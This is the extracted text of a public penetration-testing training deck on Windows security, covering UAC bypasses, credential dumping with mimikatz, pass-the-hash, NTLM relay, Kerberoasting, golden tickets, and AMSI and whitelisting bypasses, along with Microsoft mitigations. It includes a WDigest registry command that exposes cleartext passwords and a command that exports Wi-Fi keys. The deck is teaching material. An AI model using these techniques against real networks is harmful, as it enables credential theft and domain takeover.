• E.g. spawn UAC prompts until user accepts it
• Clickjacking (not possible with secure desktop)
• Technicaly not really interesting for us...
5. Many other techniques, check:
• https://github.com/hfiref0x/UACME
• Currently implements 44 different UAC bypasses…
• “UAC is dead for 2996 days”, message from 3.10.2017
• Good way to learn more about unknown Windows features…
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
UAC – Code-Injection Issue
What can we do against it? UAC – Policy settings
(but that could also be bypassed… UAC is just broken)
72
Password attacks
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
74
Password attacks
• Windows does not store your cleartext password on disk
• Store hashes instead
• However, cleartext password is in memory!
• Different types of hashes
• NT Hashes (new hash for local accounts)
• LM Hashes (old hash for local accounts)
• Domain Cached Credentials (DCC) (domain accounts
cached on a workstation if PC is not connected to domain)
• LSA secrets (e.g. service account passwords)
• Credential Manager store (applications can store
passwords here)
• Kerberos shared secrets (on DC)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
75
Password attacks
• Lan Manager LM Hash
• Very weak! (disabled per default since Server 2008 / Vista)
• You should not use LM hashes anymore
• How it works
• Convert input to upper case letter
• Max. length is 14 (shorter inputs are padded with nullbyte)
• Split the password into two 7-byte inputs
• Use both inputs as DES key to encrypt two times the string
„KGS!@#$%“
• Concatenate both 8 byte results
• Rainbowtables can crack LM hashes in seconds
• Ophcrack
• NT Hash also crackable, but it‘s harder!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
76
Password attacks
Source: http://tricks-collections.com/crack-windows-xp-vista-password/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Password Length vs. GPU Cracking
• offline password bruteforce attack speed:
• ~41.800M passwords/second (against NTLM hashes)
less than 1-2 days for all possible passwords with a length up to
8 characters (ASCII)
77
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Password Length vs. Rainbowtables
78
Publicly available rainbowtables for NT hashes ($)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
LSA Secrets
• If you configure to run a service or scheduled task with a special user account, the credentials are stored in the LSA cache
The cleartext credentials can be extracted from registry
This gave me so many times domain admin….
79
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
LSA Secrets
Clear text password of a domain admin user… ( Privilege
escalation from local admin to domain admin)
Credential guard (see later slides) does not protect LSA secrets!
80
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Dumping plaintext passwords
• We can steal stored clear text credentials from services, scheduled tasks, and so on from LSA cache and we can steal NTLM hashes (for pass-the-hash) (and some other type of credentials). However, we can also steal clear text credentials from currently logged in users!
• Local Security Authority Subsystem (LSASS) process memory contains:
• Kerberos keys (RC4/NTHash, AES128/AES256)
• Kerberos tickets (TGT and service tickets)
• NT Hashes
• (LM Hashes)
• Plaintext passwords
• (Smartcard PINs)
81
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Dumping plaintext passwords
• Dump password
with mimikatz
82
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Microsoft Prevention
• Protected Process Light• Special process flags which can mark the process as protected
• Even administrators can’t access the process anymore
• Problem: A kernel driver can disable the protection and an administrator can load a kernel driver… (partially mitigated in latest Windows 10 with driver signature enforcement)
• Also some other bypass techniques from google project zero…
• Disabled Wdigest authentication (KB2871997)• Idea: Without wdigest authentication cleartext credentials are
not required (and will not be stored in memory)
• Problem: Wdigest authentication can easily be re-enabled by an attacker….
• reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
• Other protections: RDP restricted admin mode (but this enables pass the hash attacks) and protected users group
83
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
84
Process protection
Source:
https://twitter.com/gen
tilkiwi/status/38191385
0737487872
Disables „Protected
Process Light“ flag of
lsass.exe
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
OS Layers
85
Source: Breaking Modern OS Defenses with Firmware Attacks
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Virtualization Based Security
86
Source: Breaking Modern OS Defenses with Firmware Attacks
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
OS Layers
87
Source: Breaking Modern OS Defenses with Firmware Attacks
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Mitigating Credential Theft Attacks
Windows 10 Feature: Isolated User Mode
88
Before Windows 10:
Source: Seth Moore, Microsoft
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Mitigating Credential Theft Attacks
Windows 10 Feature: Isolated User Mode
89
Source: Seth Moore, Microsoft
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
90
Credential Guard and DMA Protection
• Credential Guard:
• LSASS process split into two processes
• LSASS.exe Interactes with LSAISO
• LSAISO.exe Stores the hashes, tickets, …
• Even if we become SYSTEM privileges on a system we can‘textract hashes or tickets because they are stored in theisolated world which we can‘t access!
• However, we can just patch lsass.exe to log all credentialswhen a user logs in….
• Result: Attacker still gets the same information, he just has towait longer…
• Device Guard also part of VBS on Windows 10
• Will be discussed later
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
91
Credential Guard and DMA Protection
• DMA Protection:
• Firewire, Thunderbold, PCIe, … can access the physical
RAM memory via DMA (Direct Memory Access)!
• Start the laptop until it‘s locked in Windows login screen.
• Connect laptop via Firewire to your own system and use
DMA to overwrite the password-check function of Microsoft to
always return true
• Use any password to login!
• This also works if system is encrypted with BitLocker in
transparent mode!
• Check: https://github.com/ufrisk/pcileech
• DMA Protection tries to prevent this, however, it can only do
this as soon as Windows is loaded! During UEFI initialization
it can still be vulnerable!
NTLM & Kerberos
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
93
NTLMv1 / NTLMv2
• Another problem is the NTLM protocol• NTLM procotol is not the same as the NTLM hash!
• We previously discussed the NT & LM hash (NTLM hash)
• Now we speak about the NTLM protocol, which is also often called NetNTLMv1, NetNTLMv2, NTLMv1, NTLMv2
• Compared to Kerberos, NTLM is a weaker authentication protocol
• Main problems of NTLM protocol from security perspectiv:1. Cleartext password is NOT required to authenticate we can
authenticate by just knowing the NTLM hash (Pass-the-Hash)
2. We can force a client to authenticate against us we can sniff the NetNTLM hash and start offline bruteforcing it
3. We can relay an authenticate (NTLM relaying)
• Recommendation to read: https://digital-forensics.sans.org/blog/2012/09/18/protecting-privileged-domain-accounts-network-authentication-in-depth
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
NTLMv2
94
Source: Microsoft
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
What is the Pass-The-Hash attack? (PTH)
• Published by Paul Ashton in 1997
• Exploits the fact that only the password hash is required to
complete a NTLM authentication (password is not required)
• Every service/application supporting NTLM authentication is
vulnerable to pass-the-hash attacks
• Microsoft does not recommend to use NTLM for applications
• Side note: Since a patch this only works with the build-in
administrator or domain users which are local administrators
95
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
96
Pass-the-Hash attack
We hacked system 10.0.50.170 because of a vulnerability
• Nowadays we use MS17_010 instead of MS08_064
We obtained local admin hash and can use it to compromise other systems
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
97
Pass-the-Hash attack
System 10.0.50.160 contains another vulnerability (HFS)
Hashdump is currently not working because shell is 32-bit
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
98
Pass-the-Hash attack
Migrate into 64 bit process (PID 448)
Now we can hashdump again Same administrator hash!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
99
Pass-the-Hash attack
We can spawn shells in the domain using the hash!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
0
Mimikatz
We can also start mimikatz to get cleartext credentials of
domain users
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
1
Mimikatz
Check where the user can connect and own these systems…
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
2
Responder
• If a client connects to us, we can get a challenge + response
pair We can offline bruteforce it to obtain the clear text
password (+ we get his username. We already identified real
hackers using this technique with a callback document…)
• Victim (10.0.50.20, domain admin ckadmin):
• Attacker (10.0.50.150, running responder.py):
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
3
Responder
We need a way to force a victim to connect to us…
• Responder already includes several “poisoners” which
always respond with our IP for LLMNR, NetBios or DNS
queries…
• We can add images / sub docs in word, pdf, e-mail, …
• Many other techniques: ARP spoofing, WPAD, IPv6 DNS
injection, …
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
4
Responder
• Example: I opened my browser on the victim and entered
garbage:
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
5
Responder
• Example: Attacker is spoofing LLMNR answers which point to
the attackers IP
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
6
Responder
• But it also works if on a system currently no user is logged in…. (This
is the machine account, you can see this on the $ after the name in
WKSTN-50$):
• Important: This hash can’t be used for pass-the-hash (it’s a NTLMv2 /
Net-NTLMv2 hash. It’s the solution for the server & client challenge
calculated with the NTLM hash. If you know the NTLM hash you can
calculate the Net-NTLM hash, that’s why pass-the-hash works!)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
7
NTLM Relay Attack
We can bruteforce this hash, but we can’t pass it. However,
we can relay it (one time)!
Source: https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
8
NTLM Relay Attack
NTLM Relay: This attack is from 2001 and still works (!)
• Relaying the hash back to the same system is prevented by MS08-068
• But we can relay it to a different system (which has SMB signing off which is the default for client systems – backward compatibility ☺)
• This attack only works with local administrative users / domain admins (NTLM relay would work with any user, but the method how we get code execution works just with admins)
• We can cross-protocol relay the hash from HTTP NTLM to LDAPS NTLM on the domain controller (LDAP Signing is per default off) Send a domain admin an e-mail with a link, if he opens it, we NTLM relay to LDAPS to add a new domain admin…
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
10
9
NTLM Relay Attack
Create a list of possible targets (SMB Signing off):
Target all systems (except DC – Domain Controller):
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
110
NTLM Relay Attack
Use responder to force victims to connect to us and receive
shells / hashes (ntlmrelayx.py output):
Use the hash for pass-the-hash or we can also directly tell
ntlmrelayx.py to execute a command via the –c argument.
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
111
NTLMv1 vs. NTLMv2
• NTLMv1 (DES-based)
• Vulnerable to rainbow table attacks
• No mutual authentication
• No relay attack protection
• ~34.454.000K passwords/second (single CPU)
• NTLMv2 (MD4-based)
• Not vulnerable to rainbow table attacks (client also creates a random challenge)
• Introduces mutual authentication
• Relay attack protection (only with EPA – Extended Protection for Authentication, partially with SMB and LDAP Signing)
• ~4.585K passwords/second (single CPU)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Kerberos
Source: https://dfirblog.wordpress.com/2015/12/13/protecting-windows-networks-kerberos-attacks/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
113
How Kerberos works
• Kerberos works with symmetric encryption
• Previous picture is not 100% correct (it’s simplified)
• Message 2 which contains the TGT is encrypted with the “krbtgt” user account hash (a special domain user).
• (Message 2 also contains a session key which is encrypted with Jon’s secret message.)
• If the TGT would be encrypted with Jon’s password, Jon could just modify the TGT…. (this would break the complete security concept)
• The AS (Authentication Service) knows that Jon is really Jon because message 1 contains a timestamp encrypted by Jon with his hash.
• The ticket from message 4 is encrypted with the hash of the target service Jon can’t modify it but the service can read and handle it.
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
114
Kerberos Attacks
• Many different attacks, here I just list the most useful ones
• Kerberoasting• Request a ticket for a service, ticket is encrypted with the
password of the service account, we can start offline bruteforcing the ticket to obtain the service password!
• Using the service password we can create arbitrary service tickets (e.g. with more privileges). This is called a „silver ticket“ attack.
• Golden ticket• If we already compromised a domain, we can dump the krbtgt
hash, using it we can create our own TGT tickets (domain persistence!)
• Pass the ticket• Similar to pass-the-hash attacks, we can use mimikatz to steal
tickets and inject them on another computer
• E.g.: use the ticket to change the password of a user accwithout knowing the clear text password (we can also PTH here)
• Avoid port scanning: setspn –Q */*
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
115
Kerberoasting
• Step 1: Check the accounts which have an SPN (Service
Principal Name) set (where you can request a ticket)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
116
Kerberoasting
• Step 2: Request a ticket for the SPN (with weak RC4 type)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
117
Kerberoasting
• Step 3: Use mimikatz to dump the ticket
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
118
Kerberoasting
• Step 4: Start offline bruteforcing
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
119
Golden ticket
• As soon as we have a domain admin acc, we can “add a
faked“ domain controller (our own system) and synchronize
the password hashes with the real domain controller….
• We ask for the krbtgt user hash
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
0
Golden ticket
• We can use the hash to create arbitrary tickets! (e.g. also for
non existing user accounts which should be domain admin)
• We can use the ticket anytime for DCSync to get again
hashes for new users
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
1
Some useful commands in Windows domain
• Get user account information (e.g. last pw set):
net user /domain *userName*
• Get domain account names
net group /domain "Domain Admins"
net group /domain "Enterprise Admins“
• Get password policy
net accounts /domain
• Get firewall rules
netsh firewall show config
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
2
Some useful commands in Windows domain
• Installed AntiVirus solution (in PowerShell)
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
• Installed patches:
wmic qfe get Caption,Description,HotFixID,InstalledOn
• Get Domain controller IP:
[System.Directoryservices.Activedirectory.Domain]::GetCurrentDomain()
• Extract cleartext wlan passwords:
netsh wlan export profile folder=. key=clear
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
3
Domain recon
• Phineas Fisher: „The best tool these days for
understanding windows networks is PowerView”
• Bloodhound: Based on PowerView, visualize the
network!
• https://github.com/BloodHoundAD/BloodHound/wiki/
• Modified version of PowerView queries the information
• Queries users, computers, relationships, sessions and
display them in a graph
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
4
BloodHound / SharpHound
• Display concept:
Source: https://github.com/BloodHoundAD/BloodHound/wiki/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
5
BloodHound / SharpHound
Path from compromised user acc to domain adminSource: https://wald0.com/?p=112
Application Whitelisting
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
7
Application Whitelisting
• Idea• Servers - few applications (webserver, database server, anti virus
product, ...)
• Applications change very rarely
• Prevent the execution of other applications
• This prevents the execution of „unwanted applications“ (viruses,
malware, applications from hackers, and so on)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
8
Application Whitelisting
• Main field of application
• Systems in critical infrastructures (e.g. SCADA
environments)
• Important company systems / servers
• Workstations with high security requirements (administrative
workstations)
• Kiosk systems
• ....
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
12
9
Application Whitelisting
• Solutions:
• Microsoft AppLocker
• McAfee Application Control (Solidcore)
• Bit9 Parity Suite
• CoreTrace Bouncer
• Lumension Application Control
• SignaCert Enterprise Trust Services
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
0
Bypassing Application Whitelisting
• Problem: We cannot execute our own application
• Solution: Abuse installed / whitelisted applications Find a whitelisted application which can be used to execute code
Should be whitelisted on all systems
• Windows specific executables
• Executables installed by common 3rd party tools (e.g. Office)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
1
PowerShell
• Pentesters best friend – PowerShell
• Available since Microsoft Windows Vista
• Whitelisted per default
• Can be used to invoke shellcode (even if powershell
scripts are disabled)!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
2
PowerShell examples
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
3
PowerShell
• Example with some obfuscation (powershell –ver 2):
• Windows ignores ^
• Environment variables can be „removed“ with :~0,-Lenght
• Argument 2 can also be written as 0000000002.0000
Above payload starts PowerShell in version 2 (disabled security features like logging or AMSI)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
4
PowerShell
• The first symbol was not „?“ (this would not work), itwas U+2015
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
5
PowerShell examples
• Which PowerShell script do we start?
• Have a look at PowerSploit!
• „PowerSploit is a collection of Microsoft PowerShell modules
that can be used to aid penetration testers during all phases
of an assessment.“
• https://github.com/mattifestation/PowerSploit
• Examples: DllInjection, PE-File Injection, Invoke Shellcode,
Keylogging, Portscan, Mimikatz, …
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
6
AMSI
• Antimalware Scan Interface AMSI
• Security feature in Windows 10
• Interface for AntiVirus products to scan scripts
• PowerShell, VBScript, JScript
• Every invoked code is passed to the the AV
• PowerShell without powershell.exe is useless
• Diskless execution is useless
• Code obfuscation not so effective
• In general good idea, but many AV‘s don‘t support it…
• AV‘s currently supporting it: Microsoft Defender, AVG, ESET
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
7
AMSI
• Many public bypasses, e.g.: bypass from Matt Gaeber:• Access the (private) variable „amsiInitFailed“ from AmsiUtils class
via reflection and change it to true…
• Similiar technique works also to disable logging (however, we can
disable logging also be injecting into the service and suspending all
threads…)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
8
AMSI
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
13
9
Basic Code Execution
• Simple ideas:
• User in front of a system (Kiosk systems, Social
Engineering, ...)
• Malicious USB stick (rubber ducky)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
0
Basic Code Execution
• What if we don‘t have such a possibility?
• Attack scenario
• Send victim a file
• Victim opens/starts the file
• Victim is infected
• Typically this is not possible
• .exe, .dll, .bat, .com, and many many many more are
checked and blocked!
• However, we have to find some others...
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
1
Basic Code Execution
• Abuse of unchecked file types – HTA
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
2
